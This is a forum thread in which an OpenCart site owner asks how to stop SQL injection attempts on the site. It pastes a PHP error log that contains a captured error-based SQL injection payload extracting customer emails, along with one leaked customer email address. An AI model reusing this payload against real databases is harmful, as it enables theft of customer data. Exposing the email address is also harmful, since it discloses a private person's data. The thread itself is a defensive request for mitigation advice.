ADD Creative wrote: ↑Wed Mar 19, 2025 11:22 pm
websiteworld wrote: ↑Wed Mar 19, 2025 10:33 pm
They were getting a 503 error, however I think this filter can be added to IIS to mitigate
Remember SQL filter like that can be bypassed.
They were getting a 503 error anyway, so the attempts fail. Any suggestions other than blocking the IP address to avoid the attempts from spiking the CPU?
Here is an example of the PHP Error
[18-Mar-2025 18:46:21 UTC] PHP Fatal error: Uncaught Exception: Error: Malformed GTID set specification '
pondaraashokpatro@rediffmail.com'.<br />Error No: 1772<br />SELECT * FROM oc_seo_url WHERE `query` = 'product/catalog' or (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (SELECT CONCAT(GTID_SUBSET(CAST(SUBSTRING(email, 1, 120) AS CHAR),0x7e))) FROM `py2025`.`oc_customer_login` LIMIT 450881, 1), FLOOR(RAND(0) * 2)) x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) a) and '1'='1' AND language_id = '1' in D:\cuswebs\www2015\py***********.com\system\library\db\mysqli.php:49
Stack trace:
#0 D:\cuswebs\www2015\storage-py\modification\system\library\db.php(55): DB\MySQLi->query()
#1 D:\cuswebs\www2015\storage-py\modification\catalog\controller\startup\seo_url.php(117): DB->query()
#2 D:\cuswebs\www2015\py\system\library\url.php(64): ControllerStartupSeoUrl->rewrite()
#3 D:\cuswebs\www2015\py\catalog\controller\error\not_found.php(32): Url->link()
#4 D:\cuswebs\www2015\storage-py\modification\system\engine\action.php(79): ControllerErrorNotFound->index()
#5 D:\cuswebs\www2015\storage-pyr\modification\system\engine\router.php(77): Action->execute()
#6 D:\cuswebs\www2015\storage-py\modification\system\engine\router.php(66): Router->execute()
#7 D:\cuswebs\www2015\py\system\framework.php(179): Router->dispatch()
#8 D:\cuswebs\www2015\py\system\startup.php(104): require_once('...')
#9 D:\cuswebs\www2015\py.com\index.php(19): start()
#10 {main}
thrown in D:\cuswebs\www2015\py***************.com\system\library\db\mysqli.php on line 49